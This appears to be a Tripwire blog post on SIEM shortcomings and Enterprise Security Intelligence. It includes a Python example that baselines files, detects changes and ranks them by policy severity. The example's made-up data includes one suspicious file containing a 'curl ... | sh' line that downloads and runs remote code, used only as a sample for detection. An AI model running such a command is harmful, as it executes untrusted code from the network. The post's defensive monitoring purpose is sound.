Supercharging Incident Detection
In recent conversations I’ve had with Chief Information Security Officers and Heads of Information Security, I’ve noticed that they possess a shared goal of aligning their information security efforts with the needs of the organization. The desire to deliver specific business contextual information that allows for more intelligent analysis and better decision making is palpable.
In my search for frameworks or methods that could be used to integrate disjointed sources of data, I came across a Gartner research note titled Prepare for the Emergence of Enterprise Security Intelligence, by Joseph Feiman, VP and Gartner Fellow. Gartner defines Enterprise Security Intelligence (ESI) as an emerging concept: a comprehensive, holistic alternative to traditional disjointed security approaches that will enable stronger enterprise-wide security, optimal decision making and better business results.
So wait a minute — what about SIEM?
Don’t we already have something called Security Information and Event Management (SIEM) that is meant to address, at least partially, this need? Gartner has a research note, SIEM Enables Enterprise Security Intelligence, by Joseph Feiman and Mark Nicolett, that covers this in more detail.
In addition, the analyst firm Securosis produced a report titled Security Management 2.0: Time to Replace Your SIEM?, in which analysts Adrian Lane and Mike Rothman write: “Of the customers we talk with, there is general dissatisfaction with SIEM implementations – which in many cases have not delivered the expected value. The issues typically result from failure to scale, poor ease of use, challenges using the collected data in actionable timeframes, excessive effort for care & feeding and maintenance, or just customer execution.”
At Tripwire we also believe that SIEM alone is not enough. We believe that being aware of the full state of your systems, how they’re configured and whether they’re configured according to your policy, lets you anchor your systems to a baseline of “known and trusted state.” Just as important as this first element is the need to continuously monitor your systems for changes and deviations from that baseline, and to detect suspicious events, so that each event carries security context and can be prioritized. Here at Tripwire we call this System State Intelligence (SSI).
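To make the three pieces concrete (a baseline of known state, detection of deviations from it, and prioritization of those deviations using policy context), here is a small Python example. It is an added illustration written for this page, not code from the original post or from any Tripwire product. The file paths, file contents and the policy table are constructed for the example; a real deployment would hash files on disk and load the policy from configuration.

```python
import hashlib

# Constructed snapshots of a monitored host, path -> (content, permission mode).
# These are made-up files for the example, not data from any real system.
BASELINE_FILES = {
    "/etc/ssh/sshd_config": ("PermitRootLogin no\nPasswordAuthentication no\n", 0o600),
    "/usr/bin/sudo": ("ELF\x7fsudo-1.9", 0o4755),
    "/etc/passwd": ("root:x:0:0:root:/root:/bin/bash\n", 0o644),
    "/var/log/syslog": ("Jan  1 00:00:00 host kernel: boot\n", 0o640),
}
CURRENT_FILES = {
    # Hardening setting rolled back: content changed, mode unchanged.
    "/etc/ssh/sshd_config": ("PermitRootLogin yes\nPasswordAuthentication no\n", 0o600),
    # Binary unchanged, but permissions loosened to world-writable.
    "/usr/bin/sudo": ("ELF\x7fsudo-1.9", 0o4777),
    # Unchanged; should produce no event at all.
    "/etc/passwd": ("root:x:0:0:root:/root:/bin/bash\n", 0o644),
    # Log growth: content changed, which policy says is expected here.
    "/var/log/syslog": ("Jan  1 00:00:00 host kernel: boot\n"
                        "Jan  1 00:01:00 host sshd: started\n", 0o640),
    # New file that was not in the baseline.
    "/tmp/.hidden.sh": ("#!/bin/sh\ncurl http://example.invalid | sh\n", 0o755),
}

# Constructed policy: (path prefix, severity of an unexpected change,
# whether content churn is expected). First matching prefix wins.
POLICY = [
    ("/etc/ssh/", "critical", False),
    ("/etc/", "high", False),
    ("/usr/bin/", "high", False),
    ("/var/log/", "medium", True),
]
DEFAULT_RULE = ("medium", False)          # anything not covered by POLICY
SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4}


def snapshot(files):
    """Record the known state: SHA-256 of content plus mode for every path."""
    state = {}
    for path, (content, mode) in files.items():
        digest = hashlib.sha256(content.encode()).hexdigest()
        state[path] = {"sha256": digest, "mode": mode}
    return state


def diff_states(baseline, current):
    """Return raw deviations from the baseline: added, removed and modified paths."""
    deviations = []
    for path in sorted(set(baseline) | set(current)):
        if path not in baseline:
            deviations.append({"path": path, "kind": "added"})
        elif path not in current:
            deviations.append({"path": path, "kind": "removed"})
        else:
            changed = [f for f in ("sha256", "mode")
                       if baseline[path][f] != current[path][f]]
            if changed:
                deviations.append({"path": path, "kind": "modified", "fields": changed})
    return deviations


def lookup_rule(path):
    """Find the policy entry that governs a path, falling back to DEFAULT_RULE."""
    for prefix, severity, churn_expected in POLICY:
        if path.startswith(prefix):
            return severity, churn_expected
    return DEFAULT_RULE


def prioritize(deviations):
    """Attach policy context to each deviation and order by severity.

    Expected churn (content change on a log path) is demoted to "info" rather
    than dropped, so the record survives but does not compete for attention.
    A mode change, an added file or a removed file is never "expected" churn.
    """
    events = []
    for dev in deviations:
        severity, churn_expected = lookup_rule(dev["path"])
        only_content_changed = dev["kind"] == "modified" and dev.get("fields") == ["sha256"]
        if churn_expected and only_content_changed:
            severity = "info"
        events.append({**dev, "severity": severity})
    return sorted(events, key=lambda e: SEVERITY_RANK[e["severity"]])


def analyze(baseline_files, current_files):
    """Full pipeline: baseline, re-snapshot, diff, prioritize."""
    return prioritize(diff_states(snapshot(baseline_files), snapshot(current_files)))


if __name__ == "__main__":
    for event in analyze(BASELINE_FILES, CURRENT_FILES):
        print(f"{event['severity']:8} {event['kind']:8} {event['path']}"
              + (f" fields={event['fields']}" if 'fields' in event else ""))
```

Run stand-alone, the script lists the sshd_config rollback first (critical), then the loosened sudo permissions (high), then the new file under /tmp (medium, the default), and last the syslog growth (info); /etc/passwd produces no event because its hash and mode match the baseline. The point for a SIEM is the context attached to each event: the same "file modified" signal is an urgent finding on one path and background noise on another, and only the policy and baseline can tell them apart.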
The Benefits of Enterprise Security Intelligence
According to Gartner, ESI holds the potential to offer higher accuracy of security vulnerability detection, remediation and protection based on technology interaction and correlation. ESI also holds the potential to transform what the enterprise understands about its own security efforts, enabling correlation and impact analysis across all sources of security information and contextual information, a detailed understanding of enterprise security, and improved decision making. In this way, ESI aims to deliver both improved security and advanced business value.
How does System State Intelligence fit into ESI?
We consider SSI a key feed into the Enterprise Security Intelligence model. To understand how this works, we’ve published a brief that provides you with:
- Your complimentary copy of Prepare for the Emergence of Enterprise Security Intelligence research note
- Q&A with Dwayne Melancon, CTO of Tripwire, to explore how System State Intelligence feeds into ESI
- Solutions Brief: System State Intelligence Puts Security in Your Control
- Archived Webcast: “Supercharging SIEM with Change & Configuration Data”
These and other resources are consolidated in this overview for your download and enjoyment.